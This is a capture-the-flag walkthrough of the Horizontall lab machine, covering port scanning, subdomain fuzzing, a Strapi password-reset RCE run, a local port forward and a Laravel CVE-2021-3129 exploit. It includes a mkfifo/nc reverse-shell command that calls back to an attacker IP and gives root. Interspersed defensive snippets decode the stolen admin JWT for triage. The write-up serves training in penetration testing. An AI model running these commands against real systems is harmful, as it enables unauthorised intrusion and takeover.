Horizontall
#easy #linux
```text
PORT STATE SERVICE REASON
22/tcp open ssh syn-ack ttl 63
80/tcp open http syn-ack ttl 63
```

```bash
echo -n "$(cat allPorts.gnmap | grep -oP '\d{1,5}/open' | awk '{print $1}' FS='/' | xargs | tr ' ' ',')" | xclip -sel clip
```
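The pipeline above scrapes every `<port>/open` entry out of the greppable scan file so the list can be pasted into the next nmap run. As an added example (not part of this writeup), here is the same extraction in Python, generalised to key the result by host and protocol and to ignore `closed`, `filtered` and `open|filtered` entries, which the grep would also skip but silently. The `.gnmap` text inside it is constructed: the first host mirrors the 22/80 result of the scan, the second host and the non-open entries are made up so the filter has something to reject.

```python
import re
from typing import Dict, List

# Constructed sample in nmap's greppable (.gnmap) format. The scan in this writeup
# found 22 and 80 open on 10.129.53.146; the second host and the closed/filtered
# entries are invented so the filter logic has something to reject.
SAMPLE_GNMAP = """\
# Nmap scan initiated as: nmap -p- -sS -oG allPorts.gnmap 10.129.53.0/24
Host: 10.129.53.146 ()\tStatus: Up
Host: 10.129.53.146 ()\tPorts: 22/open/tcp//ssh///, 80/open/tcp//http///, 3306/closed/tcp//mysql///, 8000/filtered/tcp//http-alt///\tIgnored State: closed (65531)
Host: 10.129.53.200 ()\tPorts: 443/open/tcp//https///, 53/open|filtered/udp//domain///, 161/open/udp//snmp///\tIgnored State: filtered (65533)
# Nmap done -- 2 IP addresses (2 hosts up) scanned
"""

# One port entry looks like <port>/<state>/<proto>/<owner>/<service>/<rpc>/<version>/
PORT_RE = re.compile(r"(\d{1,5})/([\w|]+)/(tcp|udp)/")


def open_ports_by_host(gnmap_text: str, proto: str = "tcp") -> Dict[str, List[int]]:
    """Map each scanned host to its sorted ports whose state is exactly 'open'.

    Mirrors the grep for '\\d{1,5}/open' in the shell pipeline, but keeps hosts and
    protocols apart and drops 'closed', 'filtered' and 'open|filtered' entries.
    """
    result: Dict[str, List[int]] = {}
    for line in gnmap_text.splitlines():
        if not line.startswith("Host:") or "Ports:" not in line:
            continue  # comment lines and Status-only rows carry no ports
        host = line.split()[1]
        # the Ports field ends at the tab before "Ignored State:"
        ports_field = line.split("Ports:", 1)[1].split("\t", 1)[0]
        found = {int(port) for port, state, pr in PORT_RE.findall(ports_field)
                 if state == "open" and pr == proto}
        result[host] = sorted(set(result.get(host, [])) | found)
    return result


def nmap_port_list(gnmap_text: str, host: str, proto: str = "tcp") -> str:
    """Comma-separated open ports for one host, in the form 'nmap -p' expects."""
    return ",".join(str(p) for p in open_ports_by_host(gnmap_text, proto).get(host, []))


if __name__ == "__main__":
    print(nmap_port_list(SAMPLE_GNMAP, "10.129.53.146"))  # 22,80
```

For a single host the result is the same string the `xclip` one-liner puts on the clipboard; for a subnet-wide `.gnmap` the per-host dictionary is what you would feed an asset inventory rather than a second scan.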
```bash
nmap -p 22,80 -sCV -Pn -n -vv 10.129.53.146 -oA openPortsServicesVersion
```

```text
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack OpenSSH 7.6p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 ee:77:41:43:d4:82:bd:3e:6e:6e:50:cd:ff:6b:0d:d5 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDL2qJTqj1aoxBGb8yWIN4UJwFs4/UgDEutp3aiL2/6yV2iE78YjGzfU74VKlTRvJZWBwDmIOosOBNl9nfmEzXerD0g5lD5SporBx06eWX/XP2sQSEKbsqkr7Qb4ncvU8CvDR6yGHxmBT8WGgaQsA2ViVjiqAdlUDmLoT2qA3GeLBQgS41e+TysTpzWlY7z/rf/u0uj/C3kbixSB/upkWoqGyorDtFoaGGvWet/q7j5Tq061MaR6cM2CrYcQxxnPy4LqFE3MouLklBXfmNovryI0qVFMki7Cc3hfXz6BmKppCzMUPs8VgtNgdcGywIU/Nq1aiGQfATneqDD2GBXLjzV
| 256 3a:d5:89:d5:da:95:59:d9:df:01:68:37:ca:d5:10:b0 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBIyw6WbPVzY28EbBOZ4zWcikpu/CPcklbTUwvrPou4dCG4koataOo/RDg4MJuQP+sR937/ugmINBJNsYC8F7jN0=
| 256 4a:00:04:b4:9d:29:e7:af:37:16:1b:4f:80:2d:98:94 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIJqmDVbv9RjhlUzOMmw3SrGPaiDBgdZ9QZ2cKM49jzYB
80/tcp open http syn-ack nginx 1.14.0 (Ubuntu)
|_http-server-header: nginx/1.14.0 (Ubuntu)
|_http-title: Did not follow redirect to http://horizontall.htb
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
```

```bash
ffuf -u http://horizontall.htb -H 'Host: FUZZ.horizontall.htb' -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-110000.txt -t 80 -c -ic -fs 194
```

```text
www [Status: 200, Size: 901, Words: 43, Lines: 2, Duration: 236ms]
api-prod [Status: 200, Size: 413, Words: 76, Lines: 20, Duration: 264ms]
```

```bash
ffuf -u http://api-prod.horizontall.htb/FUZZ -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -t 80 -c -ic
```

```text
reviews [Status: 200, Size: 507, Words: 21, Lines: 1, Duration: 324ms]
users [Status: 403, Size: 60, Words: 1, Lines: 1, Duration: 262ms]
admin [Status: 200, Size: 854, Words: 98, Lines: 17, Duration: 243ms]
Reviews [Status: 200, Size: 507, Words: 21, Lines: 1, Duration: 258ms]
Users [Status: 403, Size: 60, Words: 1, Lines: 1, Duration: 251ms]
Admin [Status: 200, Size: 854, Words: 98, Lines: 17, Duration: 233ms]
REVIEWS [Status: 200, Size: 507, Words: 21, Lines: 1, Duration: 292ms]
```

```bash
cat strapi-rce.py
```

```python
import sys
import requests

# Only the version check of the script is shown here. target_url is taken from the
# first CLI argument, matching the usage below (an assumption about the rest of the script).
target_url = sys.argv[1].rstrip("/") if len(sys.argv) > 1 else "http://api-prod.horizontall.htb"


def check_strapi_version():
    print("[+] Checking Strapi CMS version")
    try:
        # /admin/init reports the running Strapi version without authentication
        response = requests.get(f"{target_url}/admin/init").json()
        strapi_version = response["data"]["strapiVersion"]
        print(f"[+] Strapi CMS Version: {strapi_version}")  # that should be 3.0.0-beta.17.4
    except Exception as e:
        print(f"[-] Failed to check Strapi version: {e}")
        sys.exit(1)
```

```bash
nc -lnvp 1111
```

```bash
python3 strapi-rce.py http://api-prod.horizontall.htb 10.10.14.8 1111
```
```text
[+] Checking Strapi CMS version
[+] Strapi CMS Version: 3.0.0-beta.17.4
[+] Exploiting reset password vulnerability
[+] Password reset successful for user admin (admin@horizontall.htb)
[+] JWT Token: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6MywiaXNBZG1pbiI6dHJ1ZSwiaWF0IjoxNzYxMTg4MTY4LCJleHAiOjE3NjM3ODAxNjh9.KCIiCxp4nVrR600bDR9LdiNkEos81nP1-PfW0rIGXcM
[+] Sending reverse shell payload
[+] Payload sent, check your listener for a shell
```
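The token printed above is what the reset-password flaw handed back: a Strapi admin JWT, minted after the script overwrote the real admin's password. Decoding its two JSON segments is the first step when triaging such a token, because it shows which account it names, whether it carries the admin flag, and how long it stays valid; for an HS256 token that lifetime is what decides whether rotating the signing secret is needed to revoke it, since nothing else invalidates an already-issued token. The script below is an added example, not part of the writeup or of the exploit. It decodes the token from the page without verifying the signature (the secret is not known here), and the claim names `id`, `isAdmin`, `iat` and `exp` come from the token itself.

```python
import base64
import json
from datetime import datetime, timezone

# The admin token printed by the exploit run above, copied from the page.
TOKEN = ("eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9."
         "eyJpZCI6MywiaXNBZG1pbiI6dHJ1ZSwiaWF0IjoxNzYxMTg4MTY4LCJleHAiOjE3NjM3ODAxNjh9."
         "KCIiCxp4nVrR600bDR9LdiNkEos81nP1-PfW0rIGXcM")


def b64url_decode(segment: str) -> bytes:
    """Decode one base64url segment, restoring the '=' padding that JWTs strip."""
    return base64.urlsafe_b64decode(segment + "=" * (-len(segment) % 4))


def decode_jwt_unverified(token: str) -> dict:
    """Return the header and payload of a JWT without checking its signature.

    This is a triage aid, not an authentication step: the signing secret is not
    known here, so nothing below proves the token is genuine; it only shows what
    the token claims about itself.
    """
    header_b64, payload_b64, _signature_b64 = token.split(".")
    return {"header": json.loads(b64url_decode(header_b64)),
            "payload": json.loads(b64url_decode(payload_b64))}


def triage_token(token: str) -> dict:
    """Facts an incident responder wants from a Strapi admin JWT: which account it
    names, whether it carries the admin flag, when it was minted and how long it lives."""
    parsed = decode_jwt_unverified(token)
    payload = parsed["payload"]
    lifetime = payload["exp"] - payload["iat"]
    return {
        "alg": parsed["header"]["alg"],
        "user_id": payload["id"],
        "is_admin": bool(payload.get("isAdmin", False)),
        "issued_at": datetime.fromtimestamp(payload["iat"], tz=timezone.utc).isoformat(),
        "lifetime_days": lifetime // 86400,
        # a token that outlives the incident window stays usable after the password
        # is fixed; for HS256 only rotating the signing secret revokes it
        "long_lived": lifetime > 86400,
    }


if __name__ == "__main__":
    for key, value in triage_token(TOKEN).items():
        print(f"{key}: {value}")
```

For this token the payload is `{"id":3,"isAdmin":true,"iat":1761188168,"exp":1763780168}`: an admin token valid for 30 days. Together with the "Password reset successful" line above, the defender-side takeaways are that the legitimate admin is now locked out of their own account, that resetting the password alone does not invalidate the token, and that unauthenticated hits on `/admin/init` followed by a password reset for the admin account are the sequence worth alerting on.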
```text
nc -nlvp 1111
Connection from 10.129.53.146:36236
/bin/sh: 0: can't access tty; job control turned off
$ strapi@horizontall:~/myapi$ ls
api build config extensions favicon.ico node_modules package.json package-lock.json public README.md
strapi@horizontall:~$ cd /home
strapi@horizontall:/home$ ls
developer
strapi@horizontall:/home$ cd developer/
strapi@horizontall:/home/developer$ ls
composer-setup.php myproject user.txt
strapi@horizontall:/home/developer$ cat user.txt
```

```text
strapi@horizontall:/home/developer$ ss -tulnp
Netid State Recv-Q Send-Q Local Address:Port Peer Address:Port
udp UNCONN 0 0 0.0.0.0:68 0.0.0.0:*
tcp LISTEN 0 80 127.0.0.1:3306 0.0.0.0:*
tcp LISTEN 0 128 0.0.0.0:80 0.0.0.0:*
tcp LISTEN 0 128 0.0.0.0:22 0.0.0.0:*
tcp LISTEN 0 128 127.0.0.1:1337 0.0.0.0:* users:(("node",pid=1966,fd=31))
tcp LISTEN 0 128 127.0.0.1:8000 0.0.0.0:*
tcp LISTEN 0 128 [::]:80 [::]:*
tcp LISTEN 0 128 [::]:22 [::]:*
```

```text
strapi@horizontall:/home/developer$ curl http://127.0.0.1:8000
Laravel v8 (PHP v7.4.18)
```

```bash
ssh -i horizontall -L 8000:localhost:8000 strapi@horizontall.htb
```

```bash
ffuf -u http://localhost:8000/FUZZ -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -t 80 -c -ic
```

```text
profiles [Status: 500, Size: 616236, Words: 32882, Lines: 248, Duration: 492ms]
```
```bash
nc -nlvp 2222
```

```bash
python3 CVE-2021-3129.py http://localhost:8000 --cmd 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.8 2222 >/tmp/f'
```

```text
nc -nlvp 2222
Connection from 10.129.53.146:60094
/bin/sh: 0: can't access tty; job control turned off
# id
uid=0(root) gid=0(root) groups=0(root)
# cd /root
# ls
boot.sh
pid
restart.sh
root.txt
# cat root.txt
```